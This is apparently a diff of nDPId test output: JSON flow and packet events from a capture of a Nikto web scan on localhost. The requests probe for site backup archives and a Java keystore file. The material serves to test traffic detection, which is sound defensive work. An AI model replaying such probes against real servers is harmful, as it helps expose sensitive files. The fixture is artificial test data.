+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277176,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/G85AAEAGIGl\/AAABfwAAAcP8H5A9SCNDeIAPvYAYAED+swAAAQEICp1m\/OCdZvzgR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277177,"pkt":"AAAAAAAAAAAAAAAACABFAADAz0lAAEAGbOx\/AAABfwAAAcP+H5CCs\/fKIUNf1IAYAED+tAAAAQEICp1m\/OGdZvzhR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277179,"pkt":"AAAAAAAAAAAAAAAACABFAADAZxxAAEAG1Rl\/AAABfwAAAcQAH5BgPl+VSob0sYAYAED+tAAAAQEICp1m\/OOdZvzjR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277180,"pkt":"AAAAAAAAAAAAAAAACABFAADGTHlAAEAG77Z\/AAABfwAAAcQCH5A4KXT5upP6C4AYAED+ugAAAQEICp1m\/OSdZvzkR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277183,"pkt":"AAAAAAAAAAAAAAAACABFAADGDUpAAEAGLuZ\/AAABfwAAAcQEH5BEmzXIVOhE3IAYAED+ugAAAQEICp1m\/OadZvzmR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277184,"pkt":"AAAAAAAAAAAAAAAACABFAADAdAhAAEAGyC1\/AAABfwAAAcQGH5BYeUyXBV+uwoAYAED+tAAAAQEICp1m\/OidZvzoR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277185,"pkt":"AAAAAAAAAAAAAAAACABFAADACsVAAEAGMXF\/AAABfwAAAcQIH5AHdTJUhgOj64AYAED+tAAAAQEICp1m\/OmdZvzpR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277186,"pkt":"AAAAAAAAAAAAAAAACABFAADEtSBAAEAGhxF\/AAABfwAAAcQKH5BCRY2PbjuWH4AYAED+uAAAAQEICp1m\/OqdZvzqR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 